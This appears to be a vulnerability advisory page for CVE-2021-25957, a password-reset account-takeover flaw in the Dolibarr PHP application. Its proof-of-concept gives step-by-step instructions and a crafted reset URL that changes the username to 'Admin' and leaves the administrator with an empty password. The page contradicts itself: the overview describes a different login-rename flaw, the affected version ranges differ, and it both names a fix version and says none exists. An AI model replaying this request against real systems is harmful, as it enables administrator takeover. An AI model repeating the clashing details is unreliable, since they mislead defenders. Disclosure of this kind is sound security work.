
We found results for “”
CVE-2021-25957
Date: August 17, 2021
Overview
In “Dolibarr” application, v3.3.beta1_20121221 to v13.0.2 have “Modify” access for admin level users to change other user’s details but fails to validate already existing “Login” name, while renaming the user “Login”. This leads to complete account takeover of the victim user. This happens since the password gets overwritten for the victim user having a similar login name.Details
The “Dolibarr” application is vulnerable to “Account Takeover Via Password Reset Functionality”. A low privileged user (Alice) can reset the password of any user in the application using the password reset link he received through email when requested for a forgotten password.PoC Details
For demonstration purposes we will use two users: “Admin” (administrator) and “alice” (low privileged user). First, login into the application and configure the SMTP section (fill up SMTP ID, SMTP password and automatic email sender). Under Users & Groups tab, click on "alice" user, select modify and add email address. Navigate to the forgot password link from the login page. Now enter the low privileged username “alice” and click on “regenerate and send password”. Then you will see a message displaying - email sent to “alice”. “alice” received a link to reset password that contains “username” and “password” in MD5 hash. Now copy the link “http://host/user/passwordforgotten.php?action=validatenewpassword&username=alice&password=d41d8cd98f00b204e9800998ecf8427e'' and rename username from “alice” to “Admin” and send request. “Admin” can now login into the application with an empty password.Affected Environments
2.8.1-13.0.2Prevention
Upgrade to version 14.0.0Language: PHP
Good to know:

Weak Password Recovery Mechanism for Forgotten Password
CWE-640
Upgrade Version
No fix version available
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | None |
Scope (S): | Unchanged |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Low |
Authentication (AU): | Single |
Confidentiality (C): | Partial |
Integrity (I): | Partial |
Availability (A): | Partial |
Additional information: |